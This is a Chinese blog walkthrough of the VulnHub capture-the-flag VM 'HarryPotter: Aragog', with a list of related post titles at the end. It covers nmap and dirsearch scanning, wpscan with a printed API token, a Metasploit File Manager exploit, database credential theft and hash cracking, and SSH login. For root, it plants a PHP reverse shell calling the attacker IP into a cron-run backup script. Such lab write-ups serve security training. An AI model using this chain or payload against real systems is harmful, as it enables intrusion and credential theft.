作者名:Demo不是emo

主页面链接:主页传送门
创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:人们感到委屈的时候通常就说睡了

今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍

这是哈利波特vm系列的第一个靶场,总共有三个靶场,其中隐藏了8个魂器,今天这个靶场中隐藏了两个,意思就是今天的靶场有两个flag,话不多说我们来见识见识

靶场地址HarryPotter: Aragog (1.0.2) ~ VulnHub

目录

一:攻击准备

二:信息收集

1.http服务探测

2.wpscan工具

3.msf获权

三.最终提权

1.数据库权限

2.用户权限

3.root提权

四:拓展


一:攻击准备

直接在vbox导入就可以,如果出现了报错,就把启用usb控制器关掉就可以正常打开了

这里除了到vulnhub下载到的目标虚拟机环境,还需要一台kali,并且两台处于同一网段(可以都用桥接模式),虚拟机管理设备用vm和virtual均可,我这里就用virtual来给大家演示了,如下面这样就是搭建完成了,具体搭建过程就不多讲了,不懂得也可以私信问我

(因为我这是校园网,有防护所以c段不同,这里都用桥接模式即可,而且靶机也显示了ip地址,只要能ping通就可以进行靶场操作了)

二:信息收集

这里看到,我的kali攻击机的ip是172.21.100.73,而目标机器的ip是172.21.122.235,既然知道了对方的ip,我们就直接用nmap详细扫描一下,扫描结果如下:

1.http服务探测

根据上面的扫描结果可以看到对方开启了22端口(ssh服务)和80端口(http服务),因为ssh需要用户名等敏感信息,所以我们就先探测对方的http服务,即通过目标的ip访问目标搭建的网页,访问结果如下:

可以看到这个页面内只有一张图片,而且在f12开发者审查元素里面也没有发现异常,在靶场之中看到图片,大部分都涉及了隐写术,这里我们用wget命令把图片下载到本地再输入steghide工具(一款开源的隐写工具)使用info参数查看图片,命令如下:

steghide info harry_potter_1.jpg 

具体操作如下:

可以看到提取图片数据时需要密码,我们并没有密码,隐写术的探索就只能暂停了,所以想要继续探测http服务就只能找敏感目录,这里我们使用kali 自带的dirsearch目录爆破工具来探测目录,命令如下:

dirsearch -u "172.21.122.235" -e *

探测结果如下:

可以看到这里扫出来目录中,/index.html/javascript, /server-status,/blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架,这些才可以访问,我们依次尝试,果然在blog这个页面发现了作者给出的提示,提示如下:(这里其他的访问页面就不展示了,太多了)

就是这样一个页面,因为全是英文,所以我们也可以来翻译一下

这里大家能看明白了吧,他提示了这是一个wordpress站点,这也印证了前面我们的猜想,同时,这个blog页面应该也是wordpress搭建的根目录

2.wpscan工具

我们这里还是用kali自带的工具wpscan来进一步获取信息,这是一款专门用来探测wordpress站点漏洞的工具,还可以检测wordpress站点用的插件存在的漏洞 ,但是这款工具wpscan规定扫描漏洞时,需要带上token值,才能显示出漏洞详细信息。这个token只需要去他的官网注册一下再登录就可以拿到了,如果不带token值,不会显示漏洞信息

这里拿到了token值 ,再依次输入下面指令(把ip换成你们自己攻击机的ip)即可

检测wordpress站点的漏洞
wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog检测wordpress站点所用插件的漏洞
wpscan --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ --url=http://172.21.122.235/blog -e vp

站点漏洞检测结果如下:

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的,所以我们直接去msf上看看有没有对应的漏洞利用工具

3.msf获权

直接打开kali的msfconsole,这个就不用介绍了吧,再使用search命令查找可以利用的工具,查找结果如下:

可以看到有四个结果,我们使用第二个,因为这个名称正是我们刚才探测出来的4个漏洞之一,use 1进入到该工具内,再使用info命令查看需要配置哪些东西

 可以看到这里需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip,再运行即可,效果如下:

可以看到,这里我们成功拿到了网站权限,第一个魂器就在家目录的hagrid98目录下

这段乱码一看就是base64格式,我们直接拿去在线站点解压,解压结果如下:

1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

翻译:1:里德尔的日记本被哈利在密室中摧毁

三.最终提权

1.数据库权限

前面获得的是网站权限,而且第二个魂器还没拿到,所以我们继续探索,wordpress用户会在mysql数据库中存储信息,在/etc/wordpress里可以打开config-default.php。这里记录了MySQL的用户名密码,可以用于登录数据库

注意:登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

python3 -c 'import pty; pty.spawn("/bin/bash");'

步骤如下

 像上面这样就是拿到了tty 权限,接下来就是根据上面拿到的mysql的账密来尝试远程登录了

可以看到这里我们成功登陆了目标的数据库,wordpress数据库保存的用户名和密码一般都放在wp_users表里面的,我们直接查找里面的内容试试

成功拿到了用户名和密码,我们将密码拿去md5在线站点解密,解密的结果如下:

password123

2.用户权限

因为我们刚才在数据库中拿到了账密,最开始的信息探测中又发现目标开启了ssh服务,所以我们直接尝试远程登录ssh服务,步骤如下:

成功拿到用户权限,现在我们就该考虑怎么提升为root权限了

3.root提权

这里我们尝试了查找了一下作者有没有留下可以sudo提权的工具和历史命令,都没有发现,那就很可能是敏感文件了,我们先看看bak备份文件

成功发现了一个以sh为后缀的文件,相信大家平时没少看到此类文件吧,此类文件大多都是脚本,我们用cat再仔细看看

这个脚本的大概意思是,把上传的文件复制到tmp这个目录里,即拷贝文件 ,说明这个文件每过一段时间就会执行,推测应该被写入了计划任务,这里我们尝试建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("172.21.100.73 ",9999);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

因为我们猜测有一个计划任务会不断执行刚刚我们找到的.backup文件,所以我们把执行脚本的命令也写入该文件内,让其不断执行脚本,加入代码后如下

 这里的/usr/bin/php是php的执行文件的目录,这样才能执行php文件,可能有的同学执行文件位置不一样,所以就需要找一下了

再新开一个终端,监听9999端口,不到一分钟就可以接收到shell了,可以看到是root用户了已经

四:拓展

这里我们也可以来查看一下计划任务,进一步验证我们的猜想

可以看到,root下确实存在了一个计划任务来执行刚才那个脚本文件 ,给自己点个赞

到这里今天的靶场就全部结束了,如果你看到这里了希望你也能给自己点个赞,最后,感谢大家的阅读,有什么问题随时都可以问评论或私信我,加油哇

【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)相关推荐

  1. VulnHub靶场之BBS (cute): 1.0.1

    VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2, ...

  2. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  3. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  4. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  5. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  6. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

  7. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  8. VulnHub靶场LupinOne

    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...

  9. Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)

    Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码) 靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/ ...

  10. vulnhub靶场,Tomato

    vulnhub靶场,Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶 ...

最新文章

  1. 怎么安装MYSQL5.0的JDBC驱动
  2. 清华大学矣晓沅:“九歌”——基于深度学习的中国古典诗歌自动生成系统
  3. SpringMVC 学习笔记(五) 基于RESTful的CRUD
  4. tensorflow从入门到精通100讲(三)-谈谈Estimator在Tensorflow中的应用
  5. 网络工程师面试PK--胜者为王
  6. 判断使用设备是PC还是phone
  7. php 调用 com,PHP调用COM函数
  8. darknet框架_【通知】有三AI发布150页深度学习开源框架指导手册与GitHub项目,欢迎加入我们的开源团队...
  9. PHP多次调用Mysql存储过程报错解决办法
  10. java下标和相等的矩阵_39.数组中数值和下标相等的元素
  11. 电磁场理论复习笔记-第一章(上)
  12. easyUI的时间控件
  13. FFmpeg mxf扩展hdr、bt2020
  14. 为什么央行降息降准,会导致债券价格上涨?
  15. win7自动登录(win7自动登录不用输入密码)
  16. 微信视频号视频或直播预约二维码如何生成?
  17. 全能修图工具Pixelmator Pro Mac
  18. elasticsearch安装 及 启动异常解决
  19. ABP框架系列之三十一:(Localization-本地化)
  20. 不朽凡人 正文 第四百八十九章 三个条件

热门文章

  1. 宣传6个9的可靠性就真的可靠吗
  2. [导入]关于Gmail无法链接的解决方法。
  3. word背景图片设置a4纸大小教程
  4. python3实例(一)平方根
  5. 北京大学数学科学学院2006\9\20声明:坚持真理、追求卓越zz
  6. java做微信支付notify_url异步通知服务端的写法
  7. drupal mysql hash密码_變更drupal7用戶密碼加密方式
  8. 大白菜U盘启动制作 1.2 官方下载
  9. C语言入门题库——求2+22+222+......+22222的值
  10. html中统计图怎么做,如何做专业、美观的图表(基础统计图部分)